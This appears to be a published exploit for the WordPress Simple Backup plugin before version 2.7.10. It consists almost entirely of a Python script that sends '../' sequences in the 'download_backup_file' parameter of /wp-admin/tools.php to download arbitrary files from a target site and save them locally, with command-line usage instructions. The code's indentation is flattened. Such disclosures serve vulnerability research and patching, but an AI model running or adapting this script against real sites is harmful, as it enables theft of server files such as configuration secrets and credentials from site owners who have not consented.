WordPress Simple Backup Path Traversal / Arbitrary File Download

`# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal  
# Date: 2024-03-06  
# Exploit Author: Ven3xy  
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip  
# Version: 2.7.10  
# Tested on: Linux  
  
import sys  
import requests  
from urllib.parse import urljoin  
import time  
  
def exploit(target_url, file_name, depth):  
traversal = '../' * depth  
  
exploit_url = urljoin(target_url, '/wp-admin/tools.php')  
params = {  
'page': 'backup_manager',  
'download_backup_file': f'{traversal}{file_name}'  
}  
  
response = requests.get(exploit_url, params=params)  
  
if response.status_code == 200 and response.headers.get('Content-Disposition') \  
and 'attachment; filename' in response.headers['Content-Disposition'] \  
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:  
print(response.text) # Replace with the desired action for the downloaded content  
  
file_path = f'simplebackup_{file_name}'  
with open(file_path, 'wb') as file:  
file.write(response.content)  
  
print(f'File saved in: {file_path}')  
else:  
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")  
  
if __name__ == "__main__":  
if len(sys.argv) != 4:  
print("Usage: python exploit.py <target_url> <file_name> <depth>")  
sys.exit(1)  
  
target_url = sys.argv[1]  
file_name = sys.argv[2]  
depth = int(sys.argv[3])  
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")  
time.sleep(5)  
  
  
exploit(target_url, file_name, depth)  
  
`